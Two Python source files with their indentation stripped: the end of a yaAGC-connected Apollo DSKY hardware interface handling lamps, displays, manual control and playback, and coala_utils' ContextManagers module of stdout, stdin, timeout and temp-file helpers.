lampUpdateTimer = threading.Timer(lampDeadtime, flushLampUpdates)
lastLedArray = [ 0, 0, 0, 0, 0, 0, 0, 0 ]
def updateLamps():
global lastLedArray
if args.pigpio:
# For directly accessing LED-controller chip via
# SPI bus using PIGPIO library.
# First step, determine what all bits need to be set in the chip's
# digit registers.
ledArray = [ 0, 0, 0, 0, 0, 0, 0, 0 ]
for key in lampStatuses:
if lampStatuses[key]["isLit"]:
parameters = lampStatuses[key]["spiParameters"]
for i in range(0, len(parameters)):
# Note that all the address fields should be 1..8.
ledArray[parameters[i]["register"] - 1] |= parameters[i]["mask"]
# Write out the registers that have changed.
for i in range(0,8):
if ledArray[i] != lastLedArray[i]:
#print("write SPI " + str(1 + i) + " <- " + hex(ledArray[i]))
writeSpi(i + 1, ledArray[i])
lastLedArray[i] = ledArray[i]
else:
# For shelling out to 'led-panel' program.
global lampUpdateTimer, lampExecCheckCount
global lastLampCliString
# First step, determine what led-panel's CLI parameter string will be.
lampCliString = ""
for key in lampStatuses:
if lampStatuses[key]["isLit"]:
lampCliString += lampStatuses[key]["cliParameter"]
lampCliString += lampCliStringDefault
# If unchanged, do nothing.
if lampCliString == lastLampCliString:
return
lampCliByte = lampCliString.ljust(14,'x').encode()
# Have to determine if led-panel is still running from before, in
# which case we can't start it again and have to retry later.
lampExecCheckCount += 1
lampUpdateTimer.cancel()
ledPanelRunning = False
for proc in psutil.process_iter():
try:
info = proc.as_dict(attrs=['name'])
if "led-panel" in info['name']:
ledPanelRunning = True
break
except psutil.NoSuchProcess:
pass
if ledPanelRunning:
print("Delaying lamp flush to avoid overlap ...")
lampExecCheckCount = 0
lampUpdateTimer = threading.Timer(lampDeadtime, updateLamps)
lampUpdateTimer.start()
return
if lampExecCheckCount < 2:
lampUpdateTimer = threading.Timer(lampDeadtime, updateLamps)
lampUpdateTimer.start()
return
lampExecCheckCount = 0
# Send lamp codes to Alarm Panel (Vlad Mihailescu)
ser_alarm.write(lampCliByte)
ser_alarm.flush()
# Everything is swell, so run 'led-panel'.
flushLampUpdates(lampCliString)
def updateLampStatusesAndLamps(key, value):
#sys.stderr.write("BL " + key + " " + oct(value) + "\n")
updateLampStatuses(key, value)
updateLamps()
def backlightOn():
for key in lampStatuses:
if key[-3:] == "KEY":
updateLampStatuses(key, True)
updateLamps()
def backlightOff():
for key in lampStatuses:
if key[-3:] == "KEY":
updateLampStatuses(key, False)
updateLamps()
def everythingOff():
for key in lampStatuses:
updateLampStatuses(key, False)
updateLamps()
displayGraphic(0, 0, imageCompActyOff)
displayGraphic(colPN, topProg, imageDigitBlank)
displayGraphic(colPN + digitWidth, topProg, imageDigitBlank)
displayGraphic(0, topVN, imageDigitBlank)
displayGraphic(digitWidth, topVN, imageDigitBlank)
displayGraphic(colPN, topVN, imageDigitBlank)
displayGraphic(colPN + digitWidth, topVN, imageDigitBlank)
displayGraphic(colSign, topR1, imagePlusMinusOff)
displayGraphic(colD1, topR1, imageDigitBlank)
displayGraphic(colD2, topR1, imageDigitBlank)
displayGraphic(colD3, topR1, imageDigitBlank)
displayGraphic(colD4, topR1, imageDigitBlank)
displayGraphic(colD5, topR1, imageDigitBlank)
displayGraphic(colSign, topR2, imagePlusMinusOff)
displayGraphic(colD1, topR2, imageDigitBlank)
displayGraphic(colD2, topR2, imageDigitBlank)
displayGraphic(colD3, topR2, imageDigitBlank)
displayGraphic(colD4, topR2, imageDigitBlank)
displayGraphic(colD5, topR2, imageDigitBlank)
displayGraphic(colSign, topR3, imagePlusMinusOff)
displayGraphic(colD1, topR3, imageDigitBlank)
displayGraphic(colD2, topR3, imageDigitBlank)
displayGraphic(colD3, topR3, imageDigitBlank)
displayGraphic(colD4, topR3, imageDigitBlank)
displayGraphic(colD5, topR3, imageDigitBlank)
everythingOff()
# This checks to see if vncserverui is running, and turns on a lamp if so.
vncCheckTimer = ""
def checkForVncserver():
global vncCheckTimer
vncserveruiFound = False
for proc in psutil.process_iter():
try:
info = proc.as_dict(attrs=['name'])
if "vncserverui" in info['name']:
vncserveruiFound = True
break
except psutil.NoSuchProcess:
pass
updateLampStatuses("VNCSERVERUI", vncserveruiFound)
updateLamps()
vncCheckTimer = threading.Timer(10, checkForVncserver)
vncCheckTimer.start()
checkForVncserver()
def timersStop():
global vnTimer, lampUpdateTimer, vncCheckTimer
print("Canceling all timers ...")
if vnTimer != "":
vnTimer.cancel()
if lampUpdateTimer != "":
lampUpdateTimer.cancel()
if vncCheckTimer != "":
vncCheckTimer.cancel()
# This function is called by the event loop only when yaAGC has written
# to an output channel. The function should do whatever it is that needs to be done
# with this output data, which is not processed additionally in any way by the
# generic portion of the program. As a test, I simply display the outputs for
# those channels relevant to the DSKY.
lastInputChannels = {
"0o10-1" : 1234567,
"0o10-2" : 1234567,
"0o10-3" : 1234567,
"0o10-4" : 1234567,
"0o10-5" : 1234567,
"0o10-6" : 1234567,
"0o10-7" : 1234567,
"0o10-8" : 1234567,
"0o10-9" : 1234567,
"0o10-10" : 1234567,
"0o10-11" : 1234567,
"0o10-12" : 1234567,
"0o11" : 1234567,
"0o13" : 1234567,
"0o163" : 1234567,
"0o15" : 1234567,
"0o32" : 1234567
}
plusMinusState1 = 0
plusMinusState2 = 0
plusMinusState3 = 0
lastKeyRel = ""
def outputFromAGC(channel, value):
# These lastInputChannels[] values are just used to avoid time-consuming redoing
# of operations which aren't actual changes; cuts down on debugging messages
# as well
global lastInputChannels, plusMinusState1, plusMinusState2, plusMinusState3
global vnFlashing, vnTimer, vnCurrentlyOn, vnImage1, vnImage2, vnImage3, vnImage4, vnTestOverride
global lastKeyRel
rawChannelValue = value
if channel == 0o10:
relay = (value >> 11) & 0o17
channelName = "0o10-" + str(relay)
value &= 0o3777
if relay < 1 or relay > 12:
return
elif channel == 0o11:
channelName = "0o11"
value &= 0x2E
elif channel == 0o13:
channelName = "0o13"
value &= 0x200
elif channel == 0o163:
channelName = "0o163"
value &= 0o720
else:
return
if (channelName in lastInputChannels) and lastInputChannels[channelName] == value:
return
lastInputChannels[channelName] = value
value = rawChannelValue
if args.record:
global lastRecordedTime
currentTime = time.time()
if lastRecordedTime < 0:
lastRecordedTime = currentTime
try:
#recordingFile.write("lastInputChannels[\"" + channelName + "\"] = " + oct(lastInputChannels[channelName]) + "\n")
recordingFile.write(str(round(1000 * (currentTime - lastRecordedTime))) + " " + ("%o" % channel) + " " + ("%o" % value) + "\n")
except:
pass
lastRecordedTime = currentTime
if channel == 0o10:
aaaa = relay
b = (value >> 10) & 0x01
ccccc = (value >> 5) & 0x1F
ddddd = value & 0x1F
if aaaa != 12:
sc,ic = codeToString(ccccc)
sd,id = codeToString(ddddd)
if aaaa == 11:
print(sc + " -> M1 " + sd + " -> M2")
displayGraphic(colPN, topProg, ic)
displayGraphic(colPN + digitWidth, topProg, id)
elif aaaa == 10:
print(sc + " -> V1 " + sd + " -> V2")
vnImage1 = ic
vnImage2 = id
displayGraphic(0, topVN, ic)
displayGraphic(digitWidth, topVN, id)
elif aaaa == 9:
print(sc + " -> N1 " + sd + " -> N2")
vnImage3 = ic
vnImage4 = id
displayGraphic(colPN, topVN, ic)
displayGraphic(colPN + digitWidth, topVN, id)
elif aaaa == 8:
print(" " + sd + " -> 11")
displayGraphic(colD1, topR1, id)
elif aaaa == 7:
plusMinus = " "
if b != 0:
plusMinus = "1+"
plusMinusState1 |= 1
else:
plusMinusState1 &= ~1
displaySign(colSign, topR1, plusMinusState1)
print(sc + " -> 12 " + sd + " -> 13 " + plusMinus)
displayGraphic(colD2, topR1, ic)
displayGraphic(colD3, topR1, id)
elif aaaa == 6:
plusMinus = " "
if b != 0:
plusMinus = "1-"
plusMinusState1 |= 2
else:
plusMinusState1 &= ~2
displaySign(colSign, topR1, plusMinusState1)
print(sc + " -> 14 " + sd + " -> 15 " + plusMinus)
displayGraphic(colD4, topR1, ic)
displayGraphic(colD5, topR1, id)
elif aaaa == 5:
plusMinus = " "
if b != 0:
plusMinus = "2+"
plusMinusState2 |= 1
else:
plusMinusState2 &= ~1
displaySign(colSign, topR2, plusMinusState2)
print(sc + " -> 21 " + sd + " -> 22 " + plusMinus)
displayGraphic(colD1, topR2, ic)
displayGraphic(colD2, topR2, id)
elif aaaa == 4:
plusMinus = " "
if b != 0:
plusMinus = "2-"
plusMinusState2 |= 2
else:
plusMinusState2 &= ~2
displaySign(colSign, topR2, plusMinusState2)
print(sc + " -> 23 " + sd + " -> 24 " + plusMinus)
displayGraphic(colD3, topR2, ic)
displayGraphic(colD4, topR2, id)
elif aaaa == 3:
print(sc + " -> 25 " + sd + " -> 31")
displayGraphic(colD5, topR2, ic)
displayGraphic(colD1, topR3, id)
elif aaaa == 2:
plusMinus = " "
if b != 0:
plusMinus = "3+"
plusMinusState3 |= 1
else:
plusMinusState3 &= ~1
displaySign(colSign, topR3, plusMinusState3)
print(sc + " -> 32 " + sd + " -> 33 " + plusMinus)
displayGraphic(colD2, topR3, ic)
displayGraphic(colD3, topR3, id)
elif aaaa == 1:
plusMinus = " "
if b != 0:
plusMinus = "3-"
plusMinusState3 |= 2
else:
plusMinusState3 &= ~2
displaySign(colSign, topR3, plusMinusState3)
print(sc + " -> 34 " + sd + " -> 35 " + plusMinus)
displayGraphic(colD4, topR3, ic)
displayGraphic(colD5, topR3, id)
elif aaaa == 12:
vel = "VEL OFF "
if (value & 0x04) != 0:
vel = "VEL ON "
updateLampStatuses("VEL", True)
else:
updateLampStatuses("VEL", False)
noAtt = "NO ATT OFF "
if (value & 0x08) != 0:
noAtt = "NO ATT ON "
updateLampStatuses("NO ATT", True)
else:
updateLampStatuses("NO ATT", False)
alt = "ALT OFF "
if (value & 0x10) != 0:
alt = "ALT ON "
updateLampStatuses("ALT", True)
else:
updateLampStatuses("ALT", False)
gimbalLock = "GIMBAL LOCK OFF "
if (value & 0x20) != 0:
gimbalLock = "GIMBAL LOCK ON "
updateLampStatuses("GIMBAL LOCK", True)
else:
updateLampStatuses("GIMBAL LOCK", False)
tracker = "TRACKER OFF "
if (value & 0x80) != 0:
tracker = "TRACKER ON "
updateLampStatuses("TRACKER", True)
else:
updateLampStatuses("TRACKER", False)
prog = "PROG OFF "
if (value & 0x100) != 0:
prog = "PROG ON "
updateLampStatuses("PROG", True)
else:
updateLampStatuses("PROG", False)
print(vel + " " + noAtt + " " + alt + " " + gimbalLock + " " + tracker + " " + prog)
updateLamps()
elif channel == 0o11:
compActy = "COMP ACTY OFF "
if (value & 0x02) != 0:
compActy = "COMP ACTY ON "
displayGraphic(0, 0, imageCompActyOn)
#ser_disp.write(b'cal.bco=' + turnON + eof)
else:
displayGraphic(0, 0, imageCompActyOff)
#ser_disp.write(b'cal.bco=' + turnOFF + eof)
uplinkActy = "UPLINK ACTY OFF "
if (value & 0x04) != 0:
uplinkActy = "UPLINK ACTY ON "
updateLampStatuses("UPLINK ACTY", True)
else:
updateLampStatuses("UPLINK ACTY", False)
flashing = "V/N NO FLASH "
if (value & 0x20) != 0:
if not vnFlashing:
vnFlashing = True
vnCurrentlyOn = True
vnTimer = threading.Timer(0.75, vnFlashingHandler)
vnTimer.start()
flashing = "V/N FLASH "
else:
if vnFlashing != False:
vnFlashingStop()
print(compActy + " " + uplinkActy + " " + " " + " " + flashing)
updateLamps()
elif channel == 0o13:
test = "DSKY TEST "
if (value & 0x200) == 0:
test = "DSKY NO TEST "
print(test)
updateLamps()
elif channel == 0o163:
if (value & 0x08) != 0:
temp = "TEMP ON "
updateLampStatuses("TEMP", True)
else:
temp = "TEMP OFF "
updateLampStatuses("TEMP", False)
if (value & 0o400) != 0:
standby = "DSKY STANDBY ON "
updateLampStatuses("DSKY STANDBY", True)
else:
standby = "DSKY STANDBY OFF"
updateLampStatuses("DSKY STANDBY", False)
if (value & 0o20) != 0:
keyRel = "KEY REL ON "
updateLampStatuses("KEY REL", True)
else:
keyRel = "KEY REL OFF "
updateLampStatuses("KEY REL", False)
if (value & 0o100) != 0:
oprErr = "OPR ERR ON "
updateLampStatuses("OPR ERR", True)
else:
oprErr = "OPR ERR OFF "
updateLampStatuses("OPR ERR", False)
if (value & 0o200) != 0:
restart = "RESTART ON "
updateLampStatuses("RESTART", True)
else:
restart = "RESTART OFF "
updateLampStatuses("RESTART", False)
print(temp + " " + standby + " " + keyRel + " " + oprErr + " " + restart)
updateLamps()
else:
print("Received from yaAGC: " + oct(value) + " -> channel " + oct(channel))
return
###################################################################################
# Lamp test
if args.lamptest:
print("Turning on all lamps ...")
for key in lampStatuses:
updateLampStatuses(key, True)
updateLamps()
print("Wait for 10 seconds ...")
time.sleep(10)
print("Turning off all lamps ...")
for key in lampStatuses:
updateLampStatuses(key, False)
updateLamps()
print("Exiting lamp test ...")
echoOn(True)
timersStop()
root.destroy()
shutdownGPIO()
os.system("xset r on &")
os._exit(0)
###################################################################################
# Direct manual control of the lamps and numerical registers.
if args.manual:
print("Direct manual control ...")
everythingOff()
def manualControl():
# The state variable determines how an input key is interpreted.
# The state consists of two parts, AREA and OFFSET, where AREA is
# 0 No area selected
# 1 PROG area
# 2 VERB area
# 3 NOUN area
# 4 R1 area
# 5 R2 area
# 6 R3 area
# 7 Lamp area
# 8 Key-backlight area
# (COMP ACTY has no AREA associated with it.)
# The OFFSET is the position within the AREA, with 0 being
# the leftmost. For the lamp area, 0 is the upper left,
# 1 the upper right, and so on, down to 13 for the lower right.
# For the key-backlight area, the order is from upper left
# downward, and then to the right: VERB NOUN + - 0 7 4 1 ....
stateAREA = 0
stateOFFSET = 0
compActy = False
stateBuffer = [
[],
[ 'c', 'c' ],
[ 'c', 'c' ],
[ 'c', 'c' ],
[ 'c', 'c', 'c', 'c', 'c', 'c' ],
[ 'c', 'c', 'c', 'c', 'c', 'c' ],
[ 'c', 'c', 'c', 'c', 'c', 'c' ],
[ '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0' ],
[ '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0' ]
]
statePrefix = [ '', 'p', 'v', 'n', 'a', 'b', 'c', 'l', 'k' ]
while True:
ch = getKey()
if ch == "":
continue
if ch == 'R':
name = ''
for i in range(1, len(statePrefix)):
name += statePrefix[i]
for j in range(0, len(stateBuffer[i])):
name += stateBuffer[i][j]
if compActy:
name += "C"
else:
name += "c"
name += ".png"
screenshot(homeDir + '/' + name)
if stateAREA == 0:
stateOFFSET = 0
if ch == 'R':
break;
elif ch == 'P':
stateAREA = 1
elif ch == 'V':
stateAREA = 2
elif ch == 'N':
stateAREA = 3
elif ch == '1':
stateAREA = 4
elif ch == '2':
stateAREA = 5
elif ch == '3':
stateAREA = 6
elif ch == '+':
stateAREA = 7
elif ch == '-':
stateAREA = 8
elif ch == 'C':
compActy = not compActy
if compActy:
displayGraphic(0, 0, imageCompActyOn)
else:
displayGraphic(0, 0, imageCompActyOff)
elif stateAREA >= 1 and stateAREA <= 6: # Numerical areas
if stateAREA == 1:
row = topProg
col = colPN + stateOFFSET * digitWidth
digits = 2
elif stateAREA == 2:
row = topVN
col = stateOFFSET * digitWidth
digits = 2
elif stateAREA == 3:
row = topVN
col = colPN + stateOFFSET * digitWidth
digits = 2
elif stateAREA == 4 or stateAREA == 5 or stateAREA == 6:
if stateAREA == 4:
row = topR1
elif stateAREA == 5:
row = topR2
else:
row = topR3
if stateOFFSET == 0:
col = colSign
else:
col = colD1 + (stateOFFSET - 1) * digitWidth
digits = 6
if ch == "K":
if stateOFFSET > 0:
stateOFFSET -= 1
elif ch == "E" or ch == "\n":
stateAREA = 0
elif ch == "P":
stateAREA = 1
stateOFFSET = 0
elif ch == "V":
stateAREA = 2
stateOFFSET = 0
elif ch == "N":
stateAREA = 3
stateOFFSET = 0
elif stateOFFSET >= digits:
continue
elif stateOFFSET == 0 and digits == 6:
if ch == "C":
displayGraphic(col, row, imagePlusMinusOff)
elif ch == "+":
displayGraphic(col, row, imagePlusOn)
elif ch == "-":
displayGraphic(col, row, imageMinusOn)
else:
continue
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
else:
if ch == "C":
displayGraphic(col, row, imageDigitBlank)
elif ch == "0":
displayGraphic(col, row, imageDigit0)
elif ch == "1":
displayGraphic(col, row, imageDigit1)
elif ch == "2":
displayGraphic(col, row, imageDigit2)
elif ch == "3":
displayGraphic(col, row, imageDigit3)
elif ch == "4":
displayGraphic(col, row, imageDigit4)
elif ch == "5":
displayGraphic(col, row, imageDigit5)
elif ch == "6":
displayGraphic(col, row, imageDigit6)
elif ch == "7":
displayGraphic(col, row, imageDigit7)
elif ch == "8":
displayGraphic(col, row, imageDigit8)
elif ch == "9":
displayGraphic(col, row, imageDigit9)
else:
continue
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif stateAREA == 7: # Lamp area
lampNames = [ "UPLINK ACTY", "TEMP", "NO ATT", "GIMBAL LOCK",
"DSKY STANDBY", "PROG", "KEY REL", "RESTART",
"OPR ERR", "TRACKER", "PRIO DSP","ALT",
"NO DAP", "VEL" ]
if ch == "E" or ch == "\n":
stateAREA = 0
elif ch == "P":
stateAREA = 1
stateOFFSET = 0
elif ch == "V":
stateAREA = 2
stateOFFSET = 0
elif ch == "N":
stateAREA = 3
stateOFFSET = 0
elif ch == "K":
if stateOFFSET > 0:
stateOFFSET -= 1
elif stateOFFSET >= len(lampNames):
continue
elif ch == "-":
updateLampStatuses(lampNames[stateOFFSET], False)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif ch == "+":
updateLampStatuses(lampNames[stateOFFSET], True)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif stateAREA == 8: # Key-backlight area
keyNames = [ "VERB KEY", "NOUN KEY",
"+ KEY", "- KEY", "0 KEY", "7 KEY",
"4 KEY", "1 KEY", "8 KEY", "5 KEY",
"2 KEY", "9 KEY", "6 KEY", "3 KEY",
"CLR KEY", "PRO KEY", "KEY REL KEY", "ENTR KEY",
"RSET KEY", "VNCSERVERUI", "TBD1", "TBD2" ]
if ch == "E" or ch == "\n":
stateAREA = 0
elif ch == "P":
stateAREA = 1
stateOFFSET = 0
elif ch == "V":
stateAREA = 2
stateOFFSET = 0
elif ch == "N":
stateAREA = 3
stateOFFSET = 0
elif ch == "K":
if stateOFFSET > 0:
stateOFFSET -= 1
elif stateOFFSET >= len(keyNames):
continue
elif ch == "-":
updateLampStatuses(keyNames[stateOFFSET], False)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
elif ch == "+":
updateLampStatuses(keyNames[stateOFFSET], True)
updateLamps()
stateBuffer[stateAREA][stateOFFSET] = ch
stateOFFSET += 1
else:
stateAREA = 0
print("Exiting manual control ...")
everythingOff()
echoOn(True)
timersStop()
root.destroy()
shutdownGPIO()
os.system("xset r on &")
os._exit(0)
manualThread = threading.Thread(target=manualControl)
manualThread.start()
root.mainloop()
os._exit(0)
###################################################################################
# Generic initialization (TCP socket setup). Has no target-specific code, and
# shouldn't need to be modified unless there are bugs.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(0)
def connectToAGC():
count = 0
sys.stderr.write("Connecting to AGC " + TCP_IP + ":" + str(TCP_PORT) + "\n")
while True:
try:
s.connect((TCP_IP, TCP_PORT))
sys.stderr.write("Connected.\n")
break
except socket.error as msg:
sys.stderr.write(str(msg) + "\n")
count += 1
if count >= 10:
sys.stderr.write("Too many retries ...\n")
time.sleep(3)
echoOn(True)
os._exit(1)
time.sleep(1)
# The following provides a clean exit from the program by simply
# hitting any key. However if get_char_keyboard_nonblock isn't
# defined, just delete the next 4 lines and use Ctrl-C to exit instead.
ch = get_char_keyboard_nonblock()
if ch != "":
sys.sderr.write("Exiting ...")
echoOn(True)
shutdownGPIO()
os._exit(1)
if args.playback:
pass
else:
connectToAGC()
if useBacklights:
backlightOn()
###################################################################################
# Event loop. Just check periodically for output from yaAGC (in which case the
# user-defined callback function outputFromAGC is executed) or data in the
# user-defined function inputsForAGC (in which case a message is sent to yaAGC).
# But this section has no target-specific code, and shouldn't need to be modified
# unless there are bugs.
keyNames = [
"none", "1 KEY", "2 KEY", "3 KEY", "4 KEY",
"5 KEY", "6 KEY", "7 KEY", "8 KEY", "9 KEY",
"none", "none", "none", "none", "none",
"none", "0 KEY", "VERB KEY", "RSET KEY", "none",
"none", "none", "none", "none", "none",
"KEY REL KEY", "+ KEY", "- KEY", "ENTR KEY", "none",
"CLR KEY", "NOUN KEY"
]
def eventLoop():
global debugKey
# Buffer for a packet received from yaAGC.
packetSize = 4
inputBuffer = bytearray(packetSize)
leftToRead = packetSize
view = memoryview(inputBuffer)
cannedRsetCount = 0
didSomething = False
while True:
if not didSomething:
time.sleep(PULSE)
didSomething = False
# Check for packet data received from yaAGC and process it.
# While these packets are always exactly 4
# bytes long, since the socket is non-blocking, any individual read
# operation may yield less bytes than that, so the buffer may accumulate data
# over time until it fills.
if args.playback:
global currentPlaybackIndex, playbackEvents, lastPlaybackTime
# Get data from playback file.
if currentPlaybackIndex < len(playbackEvents):
#print(currentPlaybackIndex)
timeNow = time.time()
desiredTime = lastPlaybackTime + playbackEvents[currentPlaybackIndex][1] / 1000.0
if timeNow >= desiredTime:
lastPlaybackTime = desiredTime
#print(playbackEvents[currentPlaybackIndex])
if playbackEvents[currentPlaybackIndex][0]:
# Channels 015 and 032 are AGC INPUT channels (hence
# are outputs from the DSKY rather than inputs to it).
# They indicate keypresses. We won't do anything with
# them other than possibly to flash backlights on the
# associated keys.
channel = playbackEvents[currentPlaybackIndex][2]
value = playbackEvents[currentPlaybackIndex][3]
if channel == 0o15:
#print("Playback keystroke event " + oct(channel) + " " + oct(value))
name = keyNames[value & 0o37]
if name == "RSET KEY":
cannedRsetCount += 1
if cannedRsetCount >= 5:
echoOn(True)
timersStop()
root.destroy()
shutdownGPIO()
os.system("xset r on &")
return
else:
cannedRsetCount == 0
updateLampStatusesAndLamps(name, False)
t = threading.Timer(0.32, updateLampStatusesAndLamps, (name, True))
t.start()
elif channel == 0o32:
if (value & 0o20000) != 0:
updateLampStatusesAndLamps("PRO KEY", True)
else:
updateLampStatusesAndLamps("PRO KEY", False)
else:
outputFromAGC(channel, value)
else:
sys.stderr.write("Command = \"" + playbackEvents[currentPlaybackIndex][2] + "\"\n")
os.system(playbackEvents[currentPlaybackIndex][2] + ' &')
currentPlaybackIndex += 1
didSomething = True
else:
# Get input from socket to AGC.
try:
numNewBytes = s.recv_into(view, leftToRead)
except:
numNewBytes = 0
if numNewBytes > 0:
view = view[numNewBytes:]
leftToRead -= numNewBytes
if leftToRead == 0:
# Prepare for next read attempt.
view = memoryview(inputBuffer)
leftToRead = packetSize
# Parse the packet just read, and call outputFromAGC().
# Start with a sanity check.
ok = 1
if (inputBuffer[0] & 0xF0) != 0x00:
ok = 0
elif (inputBuffer[1] & 0xC0) != 0x40:
ok = 0
elif (inputBuffer[2] & 0xC0) != 0x80:
ok = 0
elif (inputBuffer[3] & 0xC0) != 0xC0:
ok = 0
# Packet has the various signatures we expect.
if ok == 0:
# Note that, depending on the yaAGC version, it occasionally
# sends either a 1-byte packet (just 0xFF, older versions)
# or a 4-byte packet (0xFF 0xFF 0xFF 0xFF, newer versions)
# just for pinging the client. These packets hold no
# data and need to be ignored, but for other corrupted packets
# we print a message. And try to realign past the corrupted
# bytes.
if inputBuffer[0] != 0xff or inputBuffer[1] != 0xff or inputBuffer[2] != 0xff or inputBuffer[2] != 0xff:
if inputBuffer[0] != 0xff:
print("Illegal packet: " + hex(inputBuffer[0]) + " " + hex(inputBuffer[1]) + " " + hex(inputBuffer[2]) + " " + hex(inputBuffer[3]))
for i in range(1,packetSize):
if (inputBuffer[i] & 0xF0) == 0:
j = 0
for k in range(i,4):
inputBuffer[j] = inputBuffer[k]
j += 1
view = view[j:]
leftToRead = packetSize - j
else:
channel = (inputBuffer[0] & 0x0F) << 3
channel |= (inputBuffer[1] & 0x38) >> 3
value = (inputBuffer[1] & 0x07) << 12
value |= (inputBuffer[2] & 0x3F) << 6
value |= (inputBuffer[3] & 0x3F)
outputFromAGC(channel, value)
didSomething = True
# Check for locally-generated data for which we must generate messages
# to yaAGC over the socket. In theory, the externalData list could contain
# any number of channel operations, but in practice (at least for something
# like a DSKY implementation) it will actually contain only 0 or 1 operations.
externalData = inputsForAGC()
if externalData == "":
echoOn(True)
timersStop()
screenshot(homeDir + "/lastscrn.png")
root.destroy()
shutdownGPIO()
os.system("xset r on &")
return
for i in range(0, len(externalData)):
packetize(externalData[i])
didSomething = True
if debugKey != "":
print("GUI key = " + debugKey)
debugKey = ""
eventLoopThread = threading.Thread(target=eventLoop)
eventLoopThread.start()
root.mainloop()
shutdownGPIO()
os._exit(0)
|
ContextManagers.py
|
import builtins
import os
import platform
import signal
import sys
import tempfile
import threading
from contextlib import closing, contextmanager
from io import StringIO
from coala_utils.MutableValue import MutableValue
@contextmanager
def subprocess_timeout(sub_process, seconds, kill_pg=False):
"""
Kill subprocess if the sub process takes more the than the timeout.
:param sub_process: The sub process to run.
:param seconds: The number of seconds to allow the test to run for. If
set to 0 or a negative value, it waits indefinitely.
Floats can be used to specify units smaller than
seconds.
:param kill_pg: Boolean whether to kill the process group or only this
process. (not applicable for windows)
"""
timedout = MutableValue(False)
if seconds <= 0:
yield timedout
return
finished = threading.Event()
if platform.system() == "Windows": # pragma: no cover
kill_pg = False
def kill_it():
finished.wait(seconds)
if not finished.is_set():
timedout.value = True
if kill_pg:
pgid = os.getpgid(sub_process.pid)
os.kill(sub_process.pid, signal.SIGINT)
if kill_pg:
os.killpg(pgid, signal.SIGINT)
thread = threading.Thread(name='timeout-killer', target=kill_it)
try:
thread.start()
yield timedout
finally:
finished.set()
thread.join()
@contextmanager
def replace_stdout(replacement):
"""
Replaces stdout with the replacement, yields back to the caller and then
reverts everything back.
"""
_stdout = sys.stdout
sys.stdout = replacement
try:
yield
finally:
sys.stdout = _stdout
@contextmanager
def replace_stderr(replacement):
"""
Replaces stderr with the replacement, yields back to the caller and then
reverts everything back.
"""
_stderr = sys.stderr
sys.stderr = replacement
try:
yield
finally:
sys.stderr = _stderr
@contextmanager
def suppress_stdout():
"""
Suppresses everything going to stdout.
"""
with open(os.devnull, "w") as devnull, replace_stdout(devnull):
yield
@contextmanager
def retrieve_stdout():
"""
Yields a StringIO object from which one can read everything that was
printed to stdout. (It won't be printed to the real stdout!)
Example usage:
with retrieve_stdout() as stdout:
print("something") # Won't print to the console
what_was_printed = stdout.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stdout(sio):
oldprint = builtins.print
try:
# Overriding stdout doesn't work with libraries, this ensures even
# cached variables take this up. Well... it works.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def retrieve_stderr():
"""
Yields a StringIO object from which one can read everything that was
printed to stderr. (It won't be printed to the real stderr!)
Example usage:
with retrieve_stderr() as stderr:
print("something") # Won't print to the console
what_was_printed = stderr.getvalue() # Save the value
"""
with closing(StringIO()) as sio, replace_stderr(sio):
oldprint = builtins.print
try:
# Overriding stderr doesn't work with libraries, this ensures even
# cached variables take this up. Well... it works.
def newprint(*args, **kwargs):
kwargs['file'] = sio
oldprint(*args, **kwargs)
builtins.print = newprint
yield sio
finally:
builtins.print = oldprint
@contextmanager
def simulate_console_inputs(*inputs):
"""
Does some magic to simulate the given inputs to any calls to the ``input``
builtin. This yields back an InputGenerator object so you can check
which input was already used and append any additional inputs you want.
Example:
with simulate_console_inputs(0, 1, 2) as generator:
assert(input() == 0)
assert(generator.last_input == 0)
generator.inputs.append(3)
assert(input() == 1)
assert(input() == 2)
assert(input() == 3)
assert(generator.last_input == 3)
:param inputs: Any inputs to simulate.
:raises ValueError: Raised when was asked for more input but there's no
more provided.
"""
class InputGenerator:
def __init__(self, inputs):
self.last_input = -1
self.inputs = inputs
def generate_input(self, prompt=''):
print(prompt, end="")
self.last_input += 1
try:
return self.inputs[self.last_input]
except IndexError:
raise ValueError("Asked for more input, but no more was "
"provided from `simulate_console_inputs`.")
input_generator = InputGenerator(list(inputs))
_input = builtins.input
builtins.input = input_generator.generate_input
try:
yield input_generator
finally:
builtins.input = _input
@contextmanager
def make_temp(suffix="", prefix="tmp", dir=None):
"""
Creates a temporary file with a closed stream and deletes it when done.
:return: A contextmanager retrieving the file path.
"""
temporary = tempfile.mkstemp(suffix=suffix, prefix=prefix, dir=dir)
os.close(temporary[0])
try:
yield temporary[1]
finally:
os.remove(temporary[1])
@contextmanager
def prepare_file(lines,
filename,
force_linebreaks=True,
create_tempfile=True,
tempfile_kwargs={}):
"""
Can create a temporary file (if filename is None) with the lines.
Can also add a trailing newline to each line specified if needed.
:param lines: The lines from the file. (list or tuple of strings)
:param filename: The filename to be prepared.
:param force_linebreaks: Whether to append newlines at each line if needed.
:param create_tempfile: Whether to save lines in tempfile if needed.
:param tempfile_kwargs: Kwargs passed to tempfile.mkstemp().
"""
if force_linebreaks:
lines = type(lines)(line if line.endswith('\n') else line+'\n'
for line in lines)
if not create_tempfile and filename is None:
filename = "dummy_file_name"
if not isinstance(filename, str) and create_tempfile:
with make_temp(**tempfile_kwargs) as filename:
with open(filename, 'w', encoding='utf-8') as file:
file.writelines(lines)
yield lines, filename
else:
yield lines, filename
@contextmanager
def change_directory(path):
old_dir = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(old_dir)
@contextmanager
def open_files(*args):
"""
Handle opening and closing for multiple files at once.
:param args: Tuples with the format ``(filename, mode)``.
"""
files = []
for (file, mode) in args:
files.append(open(file, mode))
yield tuple(files)
for file in files:
file.close()
|
